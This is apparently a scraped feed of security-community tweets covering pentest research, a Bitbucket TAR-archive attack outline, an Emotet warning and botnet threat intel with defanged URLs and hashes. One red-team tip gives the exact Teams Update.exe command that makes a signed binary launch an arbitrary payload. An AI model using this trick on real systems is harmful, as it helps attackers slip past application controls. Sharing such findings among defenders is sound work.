You like device code phishing? You will like Felix Aeppli’s latest research even more. He shows how to backdoor Entra ID phished accounts by adding a new sign-in method. Details and PoC here: blog.compass-security.com/20…

"The quality of a companies IT security does not necessary reflect in the findings during a pentest. It often only becomes evident in the ability of the company to deal with such findings." Mahatma Gandhi

Made a SharpHound Collection Cheat Sheet and a little post to go with it... #BloodHoundAD insinuator.net/2021/05/dogwh…

St.Nicholas🎅🏼 has some gifts for you 🎁 If you want the Defcon Switzerland Snowflake, then retweet *this* till Sun 8.12. 23:59 CET we will select 10 at random & send each one per post PS: Dont forget to safe the date for AREA41 conference 11-12/6/2020 #DC4131 @a41con

Grippeschutzimpfung? Vorsicht: Vor dieser Infektion schützt keine Medizin! Nicht die Anlage öffnen! Nicht das Makro ausführen! #Schadsoftware #Emotet unterwegs. @certbund

Datenschutz ist doch gar nicht so schwer...

How to gain control of #Bitbucket with a TAR archive: 1. An attacker with permissions clones a repository from Bitbucket 2. He uploads a malicious TAR archive as an attachment 3. The import of the archive is triggered ... (1/2) #java #javasec #appsec

Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\ Then %userprofile%\AppData\Local\Microsoft\Teams\Update.exe --processStart payload.exe --process-start-args "whatever args" Trusted signed binary will run the payload for you 😊 #RedTeam #Pentesting

Looks like this botnet operator infected himself? Admin panel: hXXp://evernever.ddns.net/index.php Opendir: hXXp://evernever.ddns.net/uploads/screens/ URLhaus: urlhaus.abuse.ch/host/everne… Malware samples: a3303fde0f00800f18bc627b9212d6c8 658908eeec739d261f41864509827310

All I want is a gold star! #labyrenth